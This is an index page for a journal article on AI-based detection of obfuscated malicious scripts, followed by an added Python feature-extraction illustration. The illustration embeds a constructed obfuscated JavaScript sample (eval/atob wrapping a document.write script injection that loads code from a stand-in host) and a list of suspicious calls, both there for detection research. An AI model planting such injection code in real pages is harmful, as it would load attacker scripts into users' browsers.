Kookjin Kim, Jisoo Shin, Jong-Geun Park, Jung-Tae Kim
DOI: 10.4218/etrij.2024-0255
Journal: ETRI Journal, volume 47, issue 4, pages 753-770 (JCR Q3, Engineering, Electrical & Electronic; impact factor 1.6)
Publication date: 2024-12-08
Publication type: Journal article
Article page: https://onlinelibrary.wiley.com/doi/10.4218/etrij.2024-0255
PDF: https://onlinelibrary.wiley.com/doi/epdf/10.4218/etrij.2024-0255
Indexed by: Semantic Scholar
Performance evaluations of AI-based obfuscated and encrypted malicious script detection with feature optimization
In the digital security environment, obfuscation and encryption of malicious scripts are primary attack methods used to evade detection. These scripts, easily spread through websites, emails, and file downloads, can be executed automatically on users' systems, posing serious security threats. To overcome the limitations of signature-based detection, this study proposes a methodology for real-time detection of obfuscated and encrypted malicious scripts using ML/DL models with feature optimization techniques. The obfuscated script datasets were analyzed to identify their distinctive characteristics, which were classified into 16 feature sets in order to evaluate which features yield the best detection accuracy. Although commercial antivirus services detected less than 20% of these datasets, the experimental results using ML and DL models demonstrated that the proposed light gradient boosting model (LGBM) achieved the best detection accuracy and processing speed. The LGBM outperformed the other artificial intelligence models, achieving 97% accuracy and the lowest processing time on the decoded, obfuscated, and encrypted dataset cases.
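The abstract describes extracting features from obfuscated scripts and from their decoded form, then choosing the feature subset a classifier handles best. The following Python is an added illustration, not code from the paper: the page does not list the paper's 16 feature sets, so the feature names, the atob() peeling step that stands in for a "decoded" dataset, the suspicious-call list and the two sample scripts are all my own assumptions. It shows why the same script yields very different feature values before and after decoding, which is the reason a detector is evaluated on both.

```python
"""Feature extraction for obfuscated-script detection (added example).

Not the paper's code: its 16 feature sets are not listed on this page, so the
features below, the atob() peeling and the sample scripts are assumptions.
"""
import base64
import math
import re
from collections import Counter

# Constructed benign sample (not from the paper's dataset).
PLAIN_JS = """
function greet(name) {
  var message = "Hello, " + name;
  console.log(message);
}
greet("world");
"""

# Constructed obfuscated sample: an eval(atob("...")) wrapper around a payload
# that itself uses fromCharCode/unescape to hide a script injection.
_PAYLOAD = (b'var s=String.fromCharCode(104,116,116,112);'
            b'document.write(unescape("%3Cscript src=" + s + "://x/y.js%3E%3C/script%3E"));')
OBFUSCATED_JS = 'eval(atob("' + base64.b64encode(_PAYLOAD).decode("ascii") + '"));'

# Call names whose presence is a crude obfuscation indicator (assumed list).
SUSPICIOUS_CALLS = ("eval", "atob", "unescape", "fromCharCode", "Function", "document.write")

_STRING_LITERAL = re.compile(r'"[^"\n]*"|\'[^\'\n]*\'')
_IDENTIFIER = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*")
_ATOB_LITERAL = re.compile(r'atob\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')


def shannon_entropy(text: str) -> float:
    """Bits per character; base64 and packed payloads score higher than plain code."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def extract_features(script: str) -> dict:
    """Lexical/statistical features of one script (an assumed feature set)."""
    n = max(len(script), 1)
    literals = _STRING_LITERAL.findall(script)
    identifiers = _IDENTIFIER.findall(script)
    return {
        "length": len(script),
        "entropy": round(shannon_entropy(script), 3),
        "non_alnum_ratio": round(sum(not c.isalnum() and not c.isspace() for c in script) / n, 3),
        "digit_ratio": round(sum(c.isdigit() for c in script) / n, 3),
        "whitespace_ratio": round(sum(c.isspace() for c in script) / n, 3),
        "longest_string_literal": max((len(s) - 2 for s in literals), default=0),
        "avg_identifier_length": round(sum(map(len, identifiers)) / max(len(identifiers), 1), 2),
        "suspicious_calls": sum(script.count(name) for name in SUSPICIOUS_CALLS),
    }


def decode_layers(script: str, max_depth: int = 5) -> str:
    """Replace atob("<base64>") with its decoded text, repeatedly, so features can
    be computed on the inner payload. Only the literal-argument case is handled;
    this stands in for the paper's "decoded" dataset, not its decoding procedure."""
    for _ in range(max_depth):
        m = _ATOB_LITERAL.search(script)
        if m is None:
            break
        try:
            inner = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            break  # not a real base64 string; stop rather than guess
        script = script[:m.start()] + inner + script[m.end():]
    return script


def feature_vector(features: dict, selected: tuple) -> list:
    """Project onto a chosen subset; feature optimization is the search over such
    subsets for the one a model such as LightGBM classifies best and fastest."""
    return [features[name] for name in selected]


if __name__ == "__main__":
    for label, js in (("plain", PLAIN_JS), ("obfuscated", OBFUSCATED_JS),
                      ("decoded", decode_layers(OBFUSCATED_JS))):
        print(label, extract_features(js))
```

On the undecoded sample the only visible indicators are the two wrapper calls and a long, high-entropy string literal; after peeling the base64 layer the inner fromCharCode, unescape and document.write calls become countable. A model trained on one representation alone would miss whichever signal the other exposes, which is why the abstract reports results separately for the decoded, obfuscated and encrypted cases.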
Journal description:
ETRI Journal is an international, peer-reviewed multidisciplinary journal published bimonthly in English. The main focus of the journal is to provide an open forum to exchange innovative ideas and technology in the fields of information, telecommunications, and electronics.
Key topics of interest include high-performance computing, big data analytics, cloud computing, multimedia technology, communication networks and services, wireless communications and mobile computing, material and component technology, as well as security.
With an international editorial committee and experts from around the world as reviewers, ETRI Journal publishes high-quality research papers on the latest and best developments from the global community.